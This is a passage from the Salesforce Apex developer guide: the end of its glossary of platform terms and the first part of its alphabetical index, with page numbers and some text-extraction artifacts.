the user is allowed to see.
1926
Glossary
Record Locking
Record locking is the process of preventing users from editing a record, regardless of field-level security or sharing settings. Salesforce
automatically locks records that are pending approval. Users must have the Modify All object-level permission for the given object,
or the Modify All Data permission, to edit locked records. The Initial Submission Actions, Final Approval Actions, Final Rejection
Actions, and Recall Actions related lists contain Record Lock actions by default. You cannot edit this default action for initial submission
and recall actions.
Record Name
A standard field on all Salesforce objects. Whenever a record name is displayed in a Force.com application, the value is represented
as a link to a detail view of the record. A record name can be either free-form text or an autonumber field. Record Name does
not have to be a unique value.
Recycle Bin
A page that lets you view and restore deleted information. Access the Recycle Bin by using the link in the sidebar.
Relationship
A connection between two objects, used to create related lists in page layouts and detail levels in reports. Matching values in a
specified field in both objects are used to link related data; for example, if one object stores data about companies and another
object stores data about people, a relationship allows you to find out which people work at the company.
Relationship Query
In a SOQL context, a query that traverses the relationships between objects to identify and return results. Parent-to-child and
child-to-parent syntax differs in SOQL queries.
Role Hierarchy
A record-level security setting that defines different levels of users such that users at higher levels can view and edit information
owned by or shared with users beneath them in the role hierarchy, regardless of the organization-wide sharing model settings.
Roll-Up Summary Field
A field type that automatically provides aggregate values from child records in a master-detail relationship.
Running User
Each dashboard has a running user, whose security settings determine which data to display in a dashboard. If the running user is a
specific user, all dashboard viewers see data based on the security settings of that userregardless of their own personal security
settings. For dynamic dashboards, you can set the running user to be the logged-in user, so that each user sees the dashboard
according to his or her own access level.
S
SaaS
See Software as a Service (SaaS).
S-Control
Note: S-controls have been superseded by Visualforce pages. After March 2010 organizations that have never created
s-controls, as well as new organizations, won't be allowed to create them. Existing s-controls will remain unaffected, and can
still be edited.
Custom Web content for use in custom links. Custom s-controls can contain any type of content that you can display in a browser,
for example a Java applet, an Active-X control, an Excel file, or a custom HTML Web form.
Salesforce Certificate and Key Pair
Salesforce certificates and key pairs are used for signatures that verify a request is coming from your organization. They are used for
authenticated SSL communications with an external web site, or when using your organization as an Identity Provider. You only
1927
Glossary
need to generate a Salesforce certificate and key pair if you're working with an external website that wants verification that a request
is coming from a Salesforce organization.
Salesforce Record ID
A unique 15- or 18-character alphanumeric string that identifies a single record in Salesforce.
Salesforce SOA (Service-Oriented Architecture)
A powerful capability of Force.com that allows you to make calls to external Web services from within Apex.
Sandbox Organization
A nearly identical copy of a Salesforce production organization. You can create multiple sandboxes in separate environments for a
variety of purposes, such as testing and training, without compromising the data and applications in your production environment.
Semi-Join
A semi-join is a subquery on another object in an IN clause in a SOQL query. You can use semi-joins to create advanced queries,
such as getting all contacts for accounts that have an opportunity with a particular record type. See also Anti-Join.
Session ID
An authentication token that is returned when a user successfully logs in to Salesforce. The Session ID prevents a user from having
to log in again every time he or she wants to perform another action in Salesforce. Different from a record ID or Salesforce ID, which
are terms for the unique ID of a Salesforce record.
Session Timeout
The period of time after login before a user is automatically logged out. Sessions expire automatically after a predetermined length
of inactivity, which can be configured in Salesforce from Setup by clicking Security Controls. The default is 120 minutes (two hours).
The inactivity timer is reset to zero if a user takes an action in the Web interface or makes an API call.
Setter Methods
Methods that assign values. See also Getter Methods.
Setup
A menu where administrators can customize and define organization settings and Force.com apps. Depending on your organizations
user interface settings, Setup may be a link in the user interface header or in the drop-down list under your name.
Sharing
Allowing other users to view or edit information you own. There are different ways to share data:
Sharing Modeldefines the default organization-wide access levels that users have to each others information and whether
to use the hierarchies when determining access to data.
Role Hierarchydefines different levels of users such that users at higher levels can view and edit information owned by or
shared with users beneath them in the role hierarchy, regardless of the organization-wide sharing model settings.
Sharing Rulesallow an administrator to specify that all information created by users within a given group or role is automatically
shared to the members of another group or role.
Manual Sharingallows individual users to share records with other users or groups.
Apex-Managed Sharingenables developers to programmatically manipulate sharing to support their applications behavior.
See Apex-Managed Sharing.
Sharing Model
Behavior defined by your administrator that determines default access by users to different types of records.
Sharing Rule
Type of default sharing created by administrators. Allows users in a specified group or role to have access to all information created
by users within a given group or role.
Sites
Force.com Sites enables you to create public websites and applications that are directly integrated with your Salesforce
organizationwithout requiring users to log in with a username and password.
1928
Glossary
T
Tag
In Salesforce, a word or short phrases that users can associate with most records to describe and organize their data in a personalized
way. Administrators can enable tags for accounts, activities, assets, campaigns, cases, contacts, contracts, dashboards, documents,
events, leads, notes, opportunities, reports, solutions, tasks, and any custom objects (except relationship group members) Tags can
also be accessed through the SOAP API.
In Salesforce CRM Content, a descriptive label that helps classify and organize content across libraries. Users can view a list of all files
or Web links that belong to a particular tag or filter search results based on a tag or tags.
Test Case Coverage
Test cases are the expected real-world scenarios in which your code will be used. Test cases are not actual unit tests, but are documents
that specify what your unit tests should do. High test case coverage means that most or all of the real-world scenarios you have
identified are implemented as unit tests. See also Code Coverage and Unit Test.
Test Method
An Apex class method that verifies whether a particular piece of code is working properly. Test methods take no arguments, commit
no data to the database, and can be executed by the runTests() system method either through the command line or in an
Apex IDE, such as the Force.com IDE.
Test Organization
A Salesforce organization used strictly for testing. See also Sandbox Organization.
1929
Glossary
Transaction, Apex
An Apex transaction represents a set of operations that are executed as a single unit. All DML operations in a transaction either
complete successfully, or if an error occurs in one operation, the entire transaction is rolled back and no data is committed to the
database. The boundary of a transaction can be a trigger, a class method, an anonymous block of code, a Visualforce page, or a
custom Web service method.
Trigger
A piece of Apex that executes before or after records of a particular type are inserted, updated, or deleted from the database. Every
trigger runs with a set of context variables that provide access to the records that caused the trigger to fire, and all triggers run in
bulk modethat is, they process several records at once, rather than just one record at a time.
Trigger Context Variable
Default variables that provide access to information about the trigger and the records that caused it to fire.
U
Unit Test
A unit is the smallest testable part of an application, usually a method. A unit test operates on that piece of code to make sure it
works correctly. See also Test Method.
Unlimited Edition
Unlimited Edition is Salesforces solution for maximizing CRM success and extending that success across the entire enterprise through
the Force.com platform.
Unmanaged Package
A package that cannot be upgraded or controlled by its developer.
URL (Uniform Resource Locator)
The global address of a website, document, or other resource on the Internet. For example, http://www.salesforce.com.
User Acceptance Testing (UAT)
A process used to confirm that the functionality meets the planned requirements. UAT is one of the final stages before deployment
to production.
V
Validation Rule
A rule that prevents a record from being saved if it does not meet the standards that are specified.
Version
A number value that indicates the release of an item. Items that can have a version include API objects, fields and calls; Apex classes
and triggers; and Visualforce pages and components.
View
The user interface in the Model-View-Controller model, defined by Visualforce.
View State
Where the information necessary to maintain the state of the database between requests is saved.
Visualforce
A simple, tag-based markup language that allows developers to easily define custom pages and components for apps built on the
platform. Each tag corresponds to a coarse or fine-grained component, such as a section of a page, a related list, or a field. The
components can either be controlled by the same logic that is used in standard Salesforce pages, or developers can associate their
own logic with a controller written in Apex.
1930
Glossary
Visualforce Controller
See Controller, Visualforce.
Visualforce Lifecycle
The stages of execution of a Visualforce page, including how the page is created and destroyed during the course of a user session.
Visualforce Page
A web page created using Visualforce. Typically, Visualforce pages present information relevant to your organization, but they can
also modify or capture data. They can be rendered in several ways, such as a PDF document or an email attachment, and can be
associated with a CSS style.
W
Web Service
A mechanism by which two applications can easily exchange data over the Internet, even if they run on different platforms, are
written in different languages, or are geographically remote from each other.
WebService Method
An Apex class method or variable that can be used by external systems, like a mash-up with a third-party application. Web service
methods must be defined in a global class.
Web Services API
A Web services application programming interface that provides access to your Salesforce organization's information. See also SOAP
API and Bulk API.
Workflow and Approval Actions
Workflow and approval actions, such as email alerts, tasks, field updates, and outbound messages, can be triggered by a workflow
rule or approval process.
Wrapper Class
A class that abstracts common functions such as logging in, managing sessions, and querying and batching records. A wrapper class
makes an integration more straightforward to develop and maintain, keeps program logic in one place, and affords easy reuse across
components. Examples of wrapper classes in Salesforce include theAJAX Toolkit, which is a JavaScript wrapper around the Salesforce
SOAP API, wrapper classes such as CCritical Section in the CTI Adapter for Salesforce CRM Call Center, or wrapper classes
created as part of a client integration application that accesses Salesforce using the SOAP API.
WSDL (Web Services Description Language) File
An XML file that describes the format of messages you send and receive from a Web service. Your development environment's SOAP
client uses the Salesforce Enterprise WSDL or Partner WSDL to communicate with Salesforce using the SOAP API.
X
XML (Extensible Markup Language)
A markup language that enables the sharing and transportation of structured data. All Force.com components that are retrieved or
deployed through the Metadata API are represented by XML definitions.
Y
No Glossary items for this entry.
1931
Glossary
Z
No Glossary items for this entry.
1932
INDEX
A
Abstract definition modifier 55
Access modifiers 59
Action
Chatter 298
create 298
QuickAction.QuickAction 1644
Action class
instantiation 457
addError(), triggers 211
After triggers 196
Aggregate functions 136
AJAX support 254
ALL ROWS keyword 143
Anchoring bounds 376
Annotations
deprecated 79
future 80
HttpDelete 87
HttpGet 87
HttpPatch 87
HttpPost 87
HttpPut 87
isTest 81
isTest(SeeAllData=true) 421
ReadOnly 84
RemoteAction 84
RestResource 86
TestVisible 85
understanding 79
Anonymous blocks
transaction control 123
understanding 195
Ant tool 439
AnyType data type 26
Apex
designing 211
flow data type conversions 312
from WSDL 338, 341
how it works 4
introducing 1
invoking 194
learning 14
managed sharing 173
overview 2
Apex (continued)
testing 413414, 420, 422, 424
when to use 3
Apex Jobs
Using the Queueable Interface 216
Apex REST API methods
exposing data 247
Apex Tools 332
ApexPages
namespace 456
ApexPages.Action
class 457
ApexPages.IdeaStandardController class
understanding 461
ApexPages.IdeaStandardSetController
class 463
ApexPages.KnowledgeArticleVersionStandardController
class 467
ApexPages.Message
class 470
ApexPages.StandardController
class 474
ApexPages.StandardSetController
class 479
prototype object 479
ApexTestQueueItem object 1880
ApexTestResult object 1882
API calls, Web services
available for Apex 1880
compileAndTest 439, 444, 1884
compileClasses 444, 1889
compileTriggers 444, 1890
custom 238
executeanonymous 1891
executeAnonymous 195
retrieveCode 442
runTests 426, 1892
transaction control 123
when to use 3
API objects, Web services
ApexTestQueueItem 427
ApexTestResult 427
AppExchange
creating packages 1500, 1833
managed package versions 446
1933
Index
Approval
namespace 488
Approval processes
approval methods 1347
example 293
overview 292
ProcessRequest class 489
ProcessResult class 490
ProcessSubmitRequest class 493
ProcessWorkitemRequest class 497
Approval.ProcessRequest
class 489
Approval.ProcessResult
class 490
Approval.ProcessSubmitRequest
class 493
Approval.ProcessWorkitemRequest
class 497
Arrays and lists 30
Assignment statements 45
Async Apex
Using the Queueable Interface 216
Asynchronous callouts 212
asynchronous operations 292
Auth
namespace 499
Auth.AuthToken
class 505
Auth.AuthTokenConfiguration
class 499
Auth.CommunitiesUtil
class 507
Auth.RegistrationHandler
interface 509
Auth.RegistrationHandler interface
createUser method 509
updateUser method 509
Auth.SessionLevel
enum 519
Auth.UserData
class 519
B
Batch Apex
database object 1118
interfaces 225
schedule 218
using 225
Batch size, SOQL query for loop 143
C
Callout
testing 348349
Callouts
asynchronous 80
defining from a WSDL 333
execution limits 258
HTTP 346
invoking 333
limit methods 1537
limitations 357
limits 357
remote site settings 333
testing 347
testing with DML 352
timeouts 357
Calls
runTests 426
Canvas
namespace 524
Canvas.ApplicationContext
interfaces 525
Canvas.CanvasLifecycleHandler
interfaces 528
Canvas.ContextDataType enum 530
Canvas.EnvironmentContext
interfaces 531
1934
Index
Canvas.RenderContext
interfaces 537
Canvas.Test
class 539
Capturing groups 377, 1580
Case sensitivity 36
Casting
collections 89
understanding 87
Certificates
generating 354
HTTP requests 356
SOAP 355
using 354
Chaining, constructor 76
Change sets 439
Character escape sequences 26
Chatter Answers
zones 320
Chatter feed elements 281
Chatter feed items 281
Chatter feeds 281
Chatter in Apex
bookmark a feed element 274
Communities 279
examples 270278
follow to a record 278
guest users 279
like a feed element 274
Portals 279
post a batch of feed elements 272
post a batch of feed elements with a binary attachment 273
post a comment to a feed element 275
post a comment with a mention 276
post a comment with a new file 277
post a comment with an an existing file 276
post a feed element 270
post a feed element with a binary attachment 272
post a feed element with a mention 271
post a feed element with an attachment 271
share a feed element 275
subscribe to a record 275, 278
testing 291
unfollow from a record 278
unsubscribe from a record 278
wildcards 290
ChatterAnswers
namespace 543
ChatterAnswers.AccountCreator
interface 543
ChatterAnswers.AccountCreator Interface
createAccount method 543
Chunk size, SOQL query for loop 143
class 913
Class
step by step walkthrough 1922, 24
System.Limits 1537
classes
EmailFileAttachment 1156
PushNotification 1175
Classes
annotations 79
ApexPages.Action 457
ApexPages.IdeaStandardController 461
ApexPages.IdeaStandardSetController 463
ApexPages.KnowledgeArticleVersionStandardController 467
ApexPages.Message 470
ApexPages.StandardController 474
ApexPages.StandardSetController 479
API version 96
Approval.ProcessRequest 489
Approval.ProcessResult 490
Approval.ProcessSubmitRequest 493
Approval.ProcessWorkitemRequest 497
Auth.AuthToken 505
Auth.AuthTokenConfiguration 499
Auth.CommunitiesUtil 507
Auth.UserData 519
Blob 1349
Boolean 1352
Canvas.Test 539
casting 87
collections 89
ConnectApi.Announcement 996
ConnectApi.AnnouncementPage 996
ConnectApi.Announcements 547
ConnectApi.BatchResult 999
ConnectApi.Chatter 550
ConnectApi.ChatterFavorites 554
ConnectApi.ChatterFeeds 574
ConnectApi.ChatterGroups 812
ConnectApi.ChatterUsers 870
ConnectApi.Communities 898
ConnectApi.CommunityModeration 900
ConnectApi.Datacloud 913
ConnectApi.ManagedTopics 918
ConnectApi.Mentions 925
1935
Index
Classes (continued)
ConnectApi.Organization 931
ConnectApi.QuestionAndAnswers 931
ConnectApi.RecordDetails 935
ConnectApi.Records 939
ConnectApi.Topics 941
ConnectApi.Zones 971
constructors 58
Database.DeletedRecord 1091
Database.DeleteResult 1092
Database.DMLOptions 1094
Database.DmlOptions.AssignmentRuleHeader 1097
Database.DmlOptions.EmailHeader 1098
Database.EmptyRecycleBinResult 1101
Database.Error 1102
Database.GetDeletedResult 1103
Database.GetUpdatedResult 1105
Database.LeadConvert 1106
Database.LeadConvertResult 1114
Database.MergeResult 1116
Database.QueryLocator 1118
Database.QueryLocatorIterator 1119
Database.SaveResult 1120
Database.UndeleteResult 1122
Database.UpsertResult 1124
Date 1414
Datetime 1425
Decimal 1448
declaring variables 55
defining 54, 91
defining from a WSDL 333
defining methods 56
differences with Java 90
Dom.Document 1126
Dom.XmlNode 1128
Double 1461
Email 1153
example 67
Exception 1469
extending 66
from WSDL 338, 341
ID 1490
inbound email 296
InboundEmail.BinaryAttachment 1165
InboundEmail.Header 1174
InboundEmail.TextAttachment 1167
InboundEmailResult 1169
InboundEnvelope 1170
Integer 1503
Classes (continued)
interfaces 71
IsValid flag 91
KbManagement.PublishingService 1141
List 1553
Long 1567
Map 1569
messaging 1153
methods 56
naming conventions 92
precedence 94
Process.PluginDescribeResult 311, 1194
Process.PluginDescribeResult sample for lead conversion 313
Process.PluginDescribeResult.InputParameter 1197
Process.PluginDescribeResult.InputParameter class 311
Process.PluginDescribeResult.InputParameter sample for
lead conversion 313
Process.PluginDescribeResult.OutputParameter 1200
Process.PluginDescribeResult.OutputParameter class 311
Process.PluginDescribeResult.OutputParameter sample for
lead conversion 313
Process.PluginRequest 1202
Process.PluginResult 1203
properties 63
PushNotificationPayload 1178
QuickAction.DescribeAvailableQuickActionResult 1204
QuickAction.DescribeLayoutComponent 1205
QuickAction.DescribeLayoutItem 1207
QuickAction.DescribeLayoutRow 1209
QuickAction.DescribeLayoutSection 1210
QuickAction.DescribeQuickActionDefaultValue 1212
QuickAction.DescribeQuickActionResult 1213
QuickAction.QuickAction 1644
QuickAction.QuickActionRequest 1218
QuickAction.QuickActionResult 1222
Reports.AggregateColumn 1225
Reports.DetailColumn 1229
Reports.Dimension 1231
Reports.FilterOperator 1231
Reports.FilterValue 1232
Reports.GroupingColumn 1233
Reports.GroupingInfo 1235
Reports.GroupingValue 1236
Reports.ReportCurrency 1238
Reports.ReportDataCell 1239
Reports.ReportDescribeResult 1240
Reports.ReportDetailRow 1241
Reports.ReportExtendedMetadata 1242
Reports.ReportFact 1243
1936
Index
Classes (continued)
Reports.ReportFactWithDetails 1244
Reports.ReportFilter 1245
Reports.ReportInstance 1249
Reports.ReportManager 1252
Reports.ReportMetadata 1257
Reports.ReportResults 1263
Reports.ReportType 1266
Reports.ReportTypeColumn 1267
Reports.ReportTypeColumnCategory 1269
Reports.ReportTypeMetadata 1270
Reports.SummaryValue 1270
Schema.ChildRelationship 1273
Schema.DataCategory 1275
Schema.DataCategoryGroupSobjectTypePair 1276
Schema.DescribeColorResult 1279
Schema.DescribeDataCategoryGroupResult 1280
Schema.DescribeDataCategoryGroupStructureResult 1283
Schema.DescribeFieldResult 1285
Schema.DescribeIconResult 1300
Schema.DescribeSObjectResult 1303
Schema.DescribeTabResult 1311
Schema.DescribeTabSetResult 1314
Schema.FieldSet 1318
Schema.FieldSetMember 1322
Schema.PicklistEntry 1324
Schema.RecordTypeInfo 1326
Schema.SObjectField 1328
Schema.sObjectType 1329
security 172
SendEmailError 1181
SendEmailResult 1182
SessionManagement 513
Set 1675
shadowing names 92
SingleEmailMessage 1171, 1183
site 298
sObject 1702
String 1720
System.Answers 1342
System.ApexPages 1344
System.Approval 1347
System.BusinessHours 1353
System.Cases 1357
System.Cookie 1360
System.Crypto 1364
System.Database 1386
System.EncodingUtil 1465
System.Http 1472
Classes (continued)
System.HttpRequest 1474
System.HttpResponse 1483
System.Ideas 1495
System.JSON 1505
System.JSONGenerator 1510
System.JSONParser 1524
System.Matcher 1580
System.Math 1593
System.Messaging 1618
System.MultiStaticResourceCalloutMock 1621
System.Network 1624
System.PageReference 1628
System.Pattern 1637
System.RemoteObjectController 1648
System.ResetPasswordResult 1651
System.RestContext 1652
System.RestRequest 1653
System.RestResponse 1659
System.Schema 1664
System.Search 1669
System.SelectOption 1669
System.Site 1686
System.StaticResourceCalloutMock 1717
System.System 1792
System.Test 1811
System.Time 1820
System.TimeZone 1824
System.Type 1827, 1855
System.URL 1835
System.UserInfo 1844
System.Version 1852
System.XmlStreamReader 1858
System.XmlStreamWriter 1872
type resolution 95
understanding 54
using constructors 58
variables 55
Visualforce 77
with sharing 78
without sharing 78
Classesn
InboundEmail 1159
Client certificates 354
Cloud Development, Apex 5
Code
security 186
system context 169
using sharing 169
1937
Index
Collections
casting 89
classes 89
iterating 52
iteration for loops 52
lists 29
maps 29
sets 29
size limits 258
Comments 45
Community class 1342
compileAndTest call
See also deploy call 441
compileClasses call 444, 1889
compileTriggers call 444, 1890
Components
behavior versioning 447448
Compound expressions 39
ConnectApi
asynchronous operations 292
casting 289
Communities 279
context user 292
deserialization 288
equality 289
guest users 279
inputs 278
limits 288
outputs 278
Portals 279
serialization 288
system mode 292
versioning 289
with sharing keywords 292
without sharing keywords 292
ConnectAPI 545
ConnectApi.Announcement
classes 996
ConnectApi.AnnouncementPage
classes 996
ConnectApi.Announcements
class 547
ConnectApi.BatchResult
classes 999
ConnectApi.Chatter
class 550
ConnectApi.ChatterFavorites
class 554
ConnectApi.ChatterFeeds
class 574
ConnectApi.ChatterGroups
class 812
ConnectApi.ChatterMessages
class 845
ConnectApi.ChatterUsers
class 870
ConnectApi.Communities
class 898
ConnectApi.CommunityModeration
class 900
ConnectApi.Datacloud 913
ConnectApi.ManagedTopics
class 918
ConnectApi.Mentions
class 925
ConnectApi.Organization
class 931
ConnectApi.QuestionAndAnswers
class 931
ConnectApi.RecordDetails
class 935
ConnectApi.Records
class 939
ConnectApi.Topics
class 941
ConnectApi.UserProfiles
class 970
ConnectApi.Zones
class 971
Constants
about 37
defining 7475
Constructors
chaining 76
using 58
context user 292
Context variables
considerations 200
trigger 198
Control Flow 48
Controllers, Visualforce
custom 252
extending 252
maintaining view state 77
transient keyword 77
understanding 252
Conventions 1914
1938
Index
Conversions 46
ConvertLead database method 1106
Custom labels 102
Custom settings
examples 1376
methods 1375
overview 192
Custom Types
sorting 97
D
Data Categories groups and structures
describing 160
Data in Apex 101
Data types
converting 46
primitive 26
sObject 102
understanding 26
Data types and variables 25
Database
namespace 1087
Database methods
delete 455
insert 452
system static 1386
undelete 455
update 453
upsert 453
Database objects
methods 1094, 10971098, 1118
understanding 1094, 10971098, 1118
Database.Batchable
interface 1088
Database.BatchableContext
interface 1090
Database.DeletedRecord
class 1091
Database.DeleteResult
class 1092
Database.DmlOptions 120
Database.DMLOptions
class 1094
Database.DmlOptions.AssignmentRuleHeader
class 1097
Database.DmlOptions.EmailHeader
class 1098
Database.EmptyRecycleBinResult
class 1101
Database.Error
class 1102
Database.GetDeletedResult
class 1103
Database.GetUpdatedResult
class 1105
Database.LeadConvert
class 1106
Database.LeadConvertResult class 1114
Database.MergeResult
class 1116
Database.QueryLocator
class 1118
Database.QueryLocatorIterator
class 1119
Database.SaveResult
class 1120
Database.UndeleteResult
class 1122
Database.UpsertResult
class 1124
Date
data type 26
primitive data type 1414
Datetime
data type 26
primitive data type 1425
Deadlocks
avoiding 132
Debug console 385
Debug log, retaining 381
Debugging
API calls 398
classes created from WSDL documents 345
log 381
Decimal
data type 26
primitive data type 1448
rounding modes 1449
Declaring variables 35
Defining a class from a WSDL 333
Delete database method 455
Delete statement 455
deploy call 441
Deploying
additional methods 444
Force.com IDE 439
understanding 438
using change sets 439
1939
Index
Deploying (continued)
using Force.com Migration Tool 439
Deprecated annotation 79
Deprecating 447
Describe information
access all fields 156
access all sObjects 159
describing sObjects using tokens 154
describing tabs 158
permissions 157
understanding 154
using Schema method 157
Describe results
field sets 1318, 1322
fields 156, 1285
sObjects 155
Design Patterns 256
Developer Console
anonymous blocks 195
using 385
Developer Edition 13
Development
process 1213
security 186
DML
considerations 129
convert leads 117
database errors 120
delete 116
exception handling 119
insert and update 108
insert related records using foreign keys 110
merge 114
operations 107, 452
overview 104
result classes 119
setting options 120
statements vs Database class methods 105
transactions 107
undelete 117
upsert 111
DML operations
behavior 124
convertLead 1106
error object 1102
exception handling 129
execution limits 258
limit methods 1537
mixed DML in test methods 126
E
Eclipse, deploying Apex 444
Email
attachments 1156
class 1153
inbound 296
outbound 294, 1156, 1618
Email service
InboundEmail object 1159
InboundEmail.BinaryAttachment object 1165
InboundEmail.Header object 1174
InboundEmail.TextAttachment object 1167
InboundEmailResult object 1169
InboundEnvelope object 1170
understanding 250
EmailException methods 1471
EmailFileAttachment
class 1156
Encoding 374
Encryption 371, 1364
1940
Index
F
Features, new 6
Feed elements
about 281
layout 281
1941
Index
Functional tests
for SOSL queries 430
running 425
understanding 415
Future annotation 80
Future methods 212
G
Get accessors 63
Global access modifier 55, 59
Governor Limits 256
Governors
email warnings 265
execution 258
limit methods 1537
Groups, capturing 377
H
Headers
PackageVersionHeader 1898
Heap size
execution limits 258
limit methods 1537
Hello World example
understanding 1922, 24
Hierarchy custom settings
examples 1376
How to invoke Apex 194
Http class
testing 347
HTTP requests
using certificates 356
HttpCalloutMock
interface 348
HttpDelete annotation 87
HttpGet annotation 87
HttpPatch annotation 87
HttpPost annotation 87
HttpPut annotation 87
I
ID
data type 26
primitive data type 1490
Ideas
zones 320
IdeaStandardController class
instantiation 461
IdeaStandardSetController class
instantiation 463
Identifiers, reserved 1912
IDEs 15
If-else statements 49
In clause, SOQL query 141
InboundEmail
class 1159
InboundEmail object 251
InboundEmail.BinaryAttachment
class 1165
InboundEmail.Header
class 1174
InboundEmail.TextAttachment
class 1167
InboundEmailResult
class 1169
InboundEnvelope
class 1170
Initialization code
instance 60
static 60
using 60
Inline SOQL queries
locking rows for 131
returning a single record 139
Insert database method 452
Insert statement 452
Instance
initialization code 60
methods 60
variables 60
instanceof keyword 75
Integer
data type 26
primitive data type 1503
Integration using Apex 332
Interfaces
Auth.RegistrationHandler 509
Canvas.ApplicationContext 525
Canvas.CanvasLifecycleHandler 528
Canvas.EnvironmentContext 531
Canvas.RenderContext 537
ChatterAnswers.AccountCreator 543
Database.Batchable 1088
Database.BatchableContext 1090
HttpCalloutMock 348
Iterable 72
Iterator 72
1942
Index
Interfaces (continued)
Process.Plugin 1192
Schedulable 218
Support.EmailTemplateSelector 1334
Support.MilestoneTriggerTimeCalculator 1336
System.Comparable 1357
System.HttpCalloutMock 1473
System.InstallHandler 1500
System.Queueable 1641
System.QueueableContext 1643
System.Schedulable 1663
System.SchedulableContext 1664
System.UninstallHandler 1833
System.WebServiceMock 1857
UrlRewriter 1332
Invoking Apex 194
isAfter trigger variable 198
isBefore trigger variable 198
isDelete trigger variable 198
isExecuting trigger variable 198
isInsert trigger variable 198
IsTest annotation 81
isUndeleted trigger variable 198
isUpdate trigger variable 198
IsValid flag 91, 203
Iterators
custom 72
Iterable 73
using 72
J
JavaScript
RemoteAction 253
JSON
deserialization 357
generator 360
methods 357
parsing 361
serialization 357358
K
kbManagement
methods 297
KbManagement
namespace 1141
KbManagement.PublishingService
class 1141
Keywords
ALL ROWS 143
Keywords (continued)
final 37, 74
FOR UPDATE 131
instanceof 75
reserved 1912
super 75
testMethod 415
this 76
transient 77
webService 238
with sharing 78
without sharing 78
L
L-value expressions 38
Language
concepts 7
Learning Apex 14
Limit clause, SOQL query 141
limits 288
Limits
best practices for running within governor limits 265
code execution 258
code execution email warnings 265
methods 430
List
collection 1553
List iteration for loops 52
List size, SOQL query for loop 143
Lists
about 29
array notation 30
defining 29
expressions 150
iterating 52
sObject 145
sorting 31
sorting custom types 97
sorting sObjects 147
Literal expressions 38
Local variables 60
Locking statements 131
Log, debug 381
Long
data type 26
primitive data type 1567
Loops
do-while 50
execution limits 258
1943
Index
Loops (continued)
see also For loops 50
understanding 49
while 50
M
Managed packages
AppExchange 93
package versions 446
version settings 95
versions 446448
Managed sharing 173
Manual sharing 173
Map
collection 1569
Maps
considerations when using sObjects 152
equals and hashcode methods 97
iterating 52
sObjects 151
understanding 32
Matcher class
bounds 376
capturing groups 377
example 377
regions 376
searching 376
Merge statements
triggers and 204
understanding 456
Message class
instantiation 471
severity enum 471
Message severity 471
Messages
ConnectApi.ChatterMessages 845
Messaging
namespace 1152
Metadata API call
deploy 441
Methods
access modifiers 59
custom settings 1375
enum 1468
Flow.Interview 1138
instance 60
JSON 357
kbManagement 297
map 32
Methods (continued)
Network 320
package namespace prefixes 93
passing-by-value 56
recursive 56
sendEmail 294
set 32
setFixedSearchResults 430
static 60
user-defined 56
using with classes 56
void with side effects 56
XML Reader 1858
mobile push notifications
PushNotification class 1175
MultiStaticResourceCalloutMock
testing callouts 349
N
Namespace
precedence 94
prefixes 93
type resolution 95
Namespaces
ApexPages 456
Approval 488
Auth 499
Canvas 524
ChatterAnswers 543
Database 1087
Dom 1125
Flow 1138
KbManagement 1141
Messaging 1152
Process 1191
QuickAction 1203
Reports 1224
Schema 1272
Site 1332
Support 1334
System 1338
Nested lists 29
Network
methods 320
New features in this release 6
new trigger variable 198
newMap trigger variable 198
Not In clause, SOQL query 141
1944
Index
O
Objects
ApexTestQueueItem 1880
ApexTestResult 1882
old trigger variable 198
oldMap trigger variable 198
Onramping 14
Opaque bounds 376
Operations
DML 452
DML exceptions 129
Operators
precedence 44
understanding 39
Order of trigger execution 205
Overloading custom API calls 240
P
Packages
creating 1500, 1833
post install script 1500, 1833
Packages, namespaces 93
PackageVersionHeader headers 1898
PageReference class
instantiation 1628
navigation example 1630
query string example 1629
Pages, Visualforce 252
Parameterized typing 33
Parent-child relationships
SOQL queries 136
understanding 38
Passed by value, primitives 26
Passing-by-value 56
Pattern class
example 377
Patterns and Matchers 374
Performance Edition, deploying Apex 438
Permissions
enforcing using describe methods 171
Permissions and custom API calls 238, 247
Person account triggers 208
Polymorphic relationships 140
Polymorphic, methods 56
Precedence, operator 44
Primitive data types
passed by value 26
Private access modifier 55, 59
Process
namespace 1191
Process.Plugin
interface 1192
Process.Plugin interface
data type conversions 312
Process.PluginDescribeResult class 308
Process.PluginDescribeResult.InputParameter class 308
Process.PluginDescribeResult.OutputParameter class 308
Sample implementation for lead conversion 313
Process.PluginDescribeResult
class 1194
Process.PluginDescribeResult.InputParameter
class 1197
Process.PluginDescribeResult.OutputParameter
class 1200
Process.PluginRequest
class 1202
Process.PluginResult
class 1203
Processing, triggers and bulk 197
Production organizations, deploying Apex 438
Programming patterns
triggers 211
Properties 63
Protected access modifier 55, 59
Public access modifier 55, 59
push notifications
PushNotification class 1175
Push notifications
execution limits 258
PushNotification
classes 1175
PushNotificationPayload
classes 1178
Q
Queries
execution limits 258
SOQL and SOSL 133
SOQL and SOSL expressions 38
working with results 134
Quick start 19
QuickAction
namespace 1203
QuickAction.DescribeAvailableQuickActionResult
class 1204
QuickAction.DescribeLayoutComponent
class 1205
1945
Index
QuickAction.DescribeLayoutItem
class 1207
QuickAction.DescribeLayoutRow
class 1209
QuickAction.DescribeLayoutSection
class 1210
QuickAction.DescribeQuickActionDefaultValue
class 1212
QuickAction.DescribeQuickActionResult
class 1213
QuickAction.QuickAction
class 1644
QuickAction.QuickActionRequest
class 1218
QuickAction.QuickActionResult
class 1222
Quickstart tutorial
understanding 19
R
ReadOnly annotation 84
Reason field values 174
Recalculating sharing 180
Record ownership 173
Recovered records 205
Recursive
methods 56
triggers 196
Regions and regular expressions 376
Regular expressions
bounds 376
grouping 1580
regions 376
searching 1580
splitting 1637
understanding 374
Relationships, accessing fields through 135
Release notes 6
Remote site settings 333
RemoteAction annotation 84
Reports
decoding fact map 327
filtering 326
getting data 325
getting metadata 324
introduction 322
listing asynchronous runs 324
namespace 1224
requirements and limitations 322
Reports (continued)
running 323
testing 329
Reports.AggregateColumn
class 1225
Reports.ColumnDataType enum 1227
Reports.ColumnSortOrder enum 1228
Reports.DateGranularity enum 1229
Reports.DetailColumn
class 1229
Reports.Dimension
class 1231
Reports.FilterOperator
class 1231
Reports.FilterValue
class 1232
Reports.GroupingColumn
class 1233
Reports.GroupingInfo
class 1235
Reports.GroupingValue
class 1236
Reports.ReportCurrency
class 1238
Reports.ReportDataCell
class 1239
Reports.ReportDescribeResult
class 1240
Reports.ReportDetailRow
class 1241
Reports.ReportExtendedMetadata
class 1242
Reports.ReportFact
class 1243
Reports.ReportFactWithDetails
class 1244
Reports.ReportFilter
class 1245
Reports.ReportFormat enum 1249
Reports.ReportInstance
class 1249
Reports.ReportManager
class 1252
